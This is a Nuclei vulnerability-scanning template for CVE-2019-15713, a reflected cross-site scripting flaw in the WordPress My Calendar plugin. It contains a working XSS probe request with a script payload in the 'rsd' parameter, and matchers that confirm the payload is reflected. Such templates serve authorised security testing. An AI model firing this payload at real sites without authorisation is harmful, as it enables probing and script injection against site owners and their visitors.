my-nuclei-templates/CVE-2019-15713.yaml

41 lines
1.1 KiB
YAML
Raw Permalink Normal View History

2021-07-16 08:42:34 +00:00
id: CVE-2019-15713
info:
2022-06-18 08:05:25 +00:00
name: WordPress My Calendar <= 3.1.9 - Cross-Site Scripting
2021-07-27 00:25:17 +00:00
author: daffainfo,dhiyaneshDk
2021-07-16 08:42:34 +00:00
severity: medium
2022-06-18 08:05:25 +00:00
description: WordPress plugin My Calendar <= 3.1.9 is susceptible to reflected cross-site scripting which can be triggered via unescaped usage of URL parameters in multiple locations throughout the site.
2021-09-02 08:03:02 +00:00
reference:
2021-07-16 08:42:34 +00:00
- https://wpscan.com/vulnerability/9267
2022-06-18 08:05:25 +00:00
- https://wordpress.org/plugins/my-calendar/#developers
2021-07-16 08:42:34 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-15713
2021-09-17 06:03:58 +00:00
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-06-18 08:05:25 +00:00
cvss-score: 6.1
2021-09-17 06:03:58 +00:00
cve-id: CVE-2019-15713
cwe-id: CWE-79
2022-06-18 08:05:25 +00:00
tags: cve,cve2019,wordpress,xss,wp-plugin
2021-07-16 08:42:34 +00:00
requests:
- method: GET
path:
2021-07-20 23:36:53 +00:00
- '{{BaseURL}}/?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
2021-07-16 08:42:34 +00:00
matchers-condition: and
matchers:
- type: word
words:
2021-07-20 23:36:53 +00:00
- "</script><script>alert(document.domain)</script>"
2021-07-16 08:42:34 +00:00
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
2022-06-18 08:05:25 +00:00
# Enhanced by mp on 2022/04/21